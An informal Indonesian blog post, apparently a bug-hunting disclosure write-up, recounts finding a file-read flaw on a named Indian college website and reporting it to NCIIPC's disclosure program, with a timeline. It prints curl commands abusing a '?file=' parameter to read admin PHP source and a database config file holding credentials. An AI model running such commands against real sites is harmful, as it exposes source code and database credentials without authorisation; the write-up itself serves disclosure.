Ok gaes kali ini gw mau sharing segmen baru yaitu Bug Hunting ya gw sebenarnya bukan pengikut kaum bug hunter sih yang main nya di HackerOne, Redstorm dan kawan-kawan nya karena gw masih belajar jadi gak pede ikutan gituan :v
dan kebetulan sekali karena aktivitas bug hunting ini gw kenal dengan lembaga cyber india namanya NCIIPC (National Critical Information Infrastructure Protection Centre) gw mikirnya gini kalo nemu site indo berarti lapornya ke BSSN karena ini site india ya gw lapor nya ke NCIIPC lah wkwkwkkwkw.
NCIIPC menjalankan Program Responsible Vulnerability Disclosure Program (RVDP) untuk melaporkan segala Kerentanan dalam Infrastruktur Informasi Penting yang dapat menyebabkan akses, modifikasi, penggunaan, pengungkapan, gangguan, ketidakmampuan, ketidakmampuan, atau gangguan yang sama.
Dengan melaporkan kerentanan di Sektor Kritis, kita menjadi bagian dari keluarga besar NCIIPC. NCIIPC akan mengakui kontribusi kita dengan tepat.
sisanya bisa lu baca disini : http://www.nciipc.gov.in/RVDP.html
sisanya bisa lu baca disini : http://www.nciipc.gov.in/RVDP.html
nah kali ini gw iseng nemu bug di web nya di https://www.agcbosecollege.org/ karena bug nya udah di patch yaudah langsung aja gw rilis artikel nya dan ini penampakan web nya.
gw iseng download file di web nya nah karena di url nya begini
https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/attachment/1
bagian ini
?file=/home1/sysconin/public_html/agcbosecollege/attachment/1
membuat gw tertarik untuk mencoba menelusuri lebih dalam lagi dan gw coba untuk mendownload admin page nya dengan perintah
curl https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/admin/index.php
kemudian tekan enter dan source code php nya pun muncul wkwkwkkw
selanjutnya gw coba intip lagi pada bagian admin_utils.php dengan perintah
curl https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/admin/admin_utils.php
kemudian tekan enter dan berhasil keliatan dimana lokasi config database nya
dan gw langsung intip config database nya
curl https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/admin/includes/config.php
kemudian tekan enter dan keliatan deh db_name nya, db_user, db_pass nya, dan db_host juga wkwkwkwkwk.
Dan sampai disini gw cari bug lain tp gak nemu yaudah gw lapor langsung ke NCIIPC gw kirim email file pdf dan bukti pendukung ke admin web dan NCIIPC rvdp@nciipc.gov.in
setelah bilang makasih trus ngilang gak ada kabar dan gak ada angin gak ada hujan NCIIPC email gw untuk ngisi form buat update database mereka sebagai NCIIPC cyber security researcher dan security professional.
gw sendiri gak tau apa maksudnya ya mungkin aja ada sesuatu yang menarik nanti di kemudian hari wkwkwkwkwk.
Timeline
- 26 April 01:00 AM [Found Bug]
- 26 April 02:16 AM [Reporting]
- 26 April 10:27 AM [NCIIPC Say Thanks]
- Unconfirmed Date And Time [ Bug Fixed ]
- 22 May 13:39 PM [NCIIPC Asking Me For Name, Profession, Email ID, Mobile Number, And Location For Updating Database of NCIIPC Cyber Security Researcher And Security Professional ]
- Reward ?? [I Can't Confirm]
oke cukup sampai disini aja ya sekian dan terimakasih
